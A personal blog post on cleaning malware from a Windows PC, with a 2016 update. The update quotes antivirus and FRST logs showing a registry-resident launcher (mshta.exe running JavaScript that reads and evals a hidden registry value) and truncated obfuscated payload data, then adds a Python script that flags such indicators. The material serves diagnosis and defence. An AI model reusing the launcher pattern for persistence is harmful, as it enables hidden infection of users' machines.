
Thursday 6 May 2010

so you’ve looked at too many dodgy websites?


I've recently had a few people say to me “I keep getting these popups coming up on my computer”, “my internet is slow” or “my computer keeps doing funny things”.
Well, 99% of the time it's because you have malware on your computer, picked up from sites that exploit vulnerabilities in your web browser (or because you clicked on a dodgy link).
Either way, knowing how it happened doesn't really help once your computer is infected with malware. However, don't stress! There are some cool little tools and steps you can use to bring your computer back from the brink.
ComboFix and Malwarebytes are ace apps for removing malware, which you can download from here and here.
I'm not going to go into details on how to use these tools, since you can find tutorials on them here:

One thing I do recommend before starting the above scans is to disable all of your start-up programs and reboot your computer. You can do this by:
- Start -> Run -> msconfig
- Click the Startup tab -> Disable All -> Apply
- Reboot your computer



This will stop any nasty application from starting that might otherwise prevent you from completing your scan.
I also recommend Avast antivirus, which is free and works a charm! You can download it from here.
Good luck!! (“,)

--UPDATE 29/8/2016--

After having my computer's antivirus go crazy (see below), I came across this article, which put me onto FRST64.exe. It outputs text files, similar to HijackThis, of your system's registry and configuration, which helped identify a rogue registry entry.

ANTIVIRUS LOG:
8/28/2016 1:20:17 PM Deleted computer C:\Windows\SysWOW64\regsvr32.exe C:\Users\user\AppData\Local\e95688\351098.bat Trojan-PoweLike!bat (Trojan)


FRST64 ADDITIONAL.TXT LOG:
HKU\S-1-5-21-1343024091-879983540-725345543-353852\Software\Classes\5faa59: "C:\windows\system32\mshta.exe" "javascript:Agz6G3="u6fd3P";zI9=new ActiveXObject("WScript.Shell");MIhcJ62c="S";im4sq=zI9.RegRead("HKCU\\software\\wqsrljgxw\\hxzhyjrthx");tU7cy="a";eval(im4sq);uGe8gIi="W8O1iRIP";" <===== ATTENTION



REGISTRY LINK FROM ABOVE:
[HKEY_CURRENT_USER\SOFTWARE\wqsrljgxw]
"ahoigdbva"="¡– ‡¯ òʹ#š¾âŠÊl · Ëqçÿé¶)¿ñK&§ÚùL ouæ
ጔ¤5ØÞUî?ls†Ý¶ÅÚ$\"=Ñy|”ÿׂ „ha¹Ïä1®óB ?¶sZ] GíšTK]\\·­"
"hxzhyjrthx"="LONGSTRING\"ZHdGIVI32sNP1VbF0hnRG4MJzHuCbQkrR9HMWQOVS4zT\";PwJqcOXUYB7vlCXYwLUWc3LOy=\"WOA8CYMIP4KNlWyXFa491bjXVx7Nkz4Uif\";MLXMiaLpJJuDkQpC9ckm=\"FHzfEhj7fuxeoTaXfvFshrKWmJjPl1l5MotArTMccA02y\";UyXPsUybcHukTaYbnK9Fz=\"CtWJmrM6depmg1Ul1gpM\";FtZgLYezKzke6LTTVpbwtfZA=\"hXeP6Qat5LngcDhbGUfmFPa46qXyKG6Q1\";Q1ITR3c=\"\";for(n7eb5oWpw=0;n7eb5oWpw
"sycsxfogs"="894"
"ijvq"="BD922737E41209AD"
"umga"="1469255575"
"yraycv"="Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
"jpxuz"="LONGSTRING"
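The FRST line above shows the pattern worth recognising: a value under HKU\...\Software\Classes launches mshta.exe with a javascript: URL, that script creates WScript.Shell, reads a second registry value (RegRead) and runs it with eval, so the actual payload lives only in the registry and the launcher is tiny. The script below is an added example, not part of this post and not FRST's own code: it scores FRST-style log lines on those indicators, pulls out the registry path the launcher reads (so you know which key to export next, as the post does above), and then flags values in a .reg export that look like stored script or configuration. The sample log line and export are constructed and abridged from the entries above (placeholder SID, a made-up benign Run entry), and the LONGSTRING marker is treated as the export's placeholder for oversized data, which is an assumption.

```python
"""Triage helper for FRST-style log lines and .reg exports (constructed example).

Not part of the original post or of FRST. It encodes the indicators visible in
the logs above: mshta.exe launching a javascript: URL, RegRead of a user-land
key, and eval of the fetched string, then links the launcher to the key it reads.
"""
import re
from typing import Dict, List

# Indicator tokens (lower-case) and why each one matters. Assumed, not FRST's.
SUSPICIOUS_TOKENS = {
    "mshta.exe": "mshta used as a launcher",
    "javascript:": "inline javascript: URL passed to mshta",
    "activexobject": "scripting COM object instantiated",
    "regread": "payload fetched from the registry",
    "eval(": "fetched string evaluated as code",
    "longstring": "oversized value (assumed truncated in the export)",
}

# The RegRead("...") call inside the javascript: launcher.
REGREAD_RE = re.compile(r'RegRead\("([^"]+)"\)')
# One [key] line and one "name"="value" line of a .reg export (value may be cut off).
REG_KEY_RE = re.compile(r'^\[(.+)\]$')
REG_VALUE_RE = re.compile(r'^"([^"]+)"="(.*?)"?$')


def score_line(line: str) -> List[str]:
    """Return the reasons a line looks like the mshta/RegRead/eval launcher."""
    low = line.lower()
    return [why for tok, why in SUSPICIOUS_TOKENS.items() if tok in low]


def regread_targets(line: str) -> List[str]:
    """Registry paths read by the launcher. The log shows them with doubled
    backslashes because they sit inside a JavaScript string literal."""
    return [p.replace("\\\\", "\\") for p in REGREAD_RE.findall(line)]


def triage_frst(lines: List[str], min_hits: int = 2) -> List[dict]:
    """Flag lines carrying at least min_hits indicators and list keys to pull next."""
    findings = []
    for line in lines:
        hits = score_line(line)
        if len(hits) >= min_hits:
            findings.append({"hits": hits, "next_keys": regread_targets(line)})
    return findings


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a minimal .reg export into {key: {name: value}}."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        m = REG_KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = REG_VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = m.group(2)
    return keys


def triage_reg(text: str) -> Dict[str, List[str]]:
    """Return {key\\name: reasons} for values that look like stored script or config."""
    flagged: Dict[str, List[str]] = {}
    for key, values in parse_reg_export(text).items():
        for name, value in values.items():
            reasons = score_line(value)
            if "for(" in value or '=\\"' in value:
                reasons.append("JavaScript fragments stored as registry data")
            if value.startswith("Mozilla/"):
                reasons.append("browser User-Agent string stored as registry data")
            if reasons:
                flagged[f"{key}\\{name}"] = reasons
    return flagged


# Constructed sample input: the FRST line above (abridged, placeholder SID) plus
# a made-up benign Run entry, and a .reg export in the same shape as the one above.
SAMPLE_FRST = [
    r'HKU\S-1-5-21-EXAMPLE\Software\Classes\5faa59: "C:\windows\system32\mshta.exe" '
    r'"javascript:zI9=new ActiveXObject("WScript.Shell");'
    r'im4sq=zI9.RegRead("HKCU\\software\\wqsrljgxw\\hxzhyjrthx");eval(im4sq);" <===== ATTENTION',
    r'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run: [ExampleUpdater] => C:\Program Files\Example\updater.exe',
]
SAMPLE_REG = r'''
[HKEY_CURRENT_USER\SOFTWARE\wqsrljgxw]
"hxzhyjrthx"="LONGSTRING\"ZHdGIVI32sNP1VbF0hnRG4MJzHuCbQkrR9HMWQOVS4zT\";Q1ITR3c=\"\";for(n7eb5oWpw=0;n7eb5oWpw"
"sycsxfogs"="894"
"yraycv"="Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
"jpxuz"="LONGSTRING"
'''

if __name__ == "__main__":
    for finding in triage_frst(SAMPLE_FRST):
        print("launcher:", finding["hits"])
        print("export next:", finding["next_keys"])
    for path, reasons in triage_reg(SAMPLE_REG).items():
        print(path, "->", reasons)
```

Run it on the real Addition.txt by reading the file into a list of lines and passing it to triage_frst; the next_keys it prints are the keys to export and feed to triage_reg. Requiring two indicators per line keeps an ordinary Run entry that merely mentions a script host from being flagged on its own.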
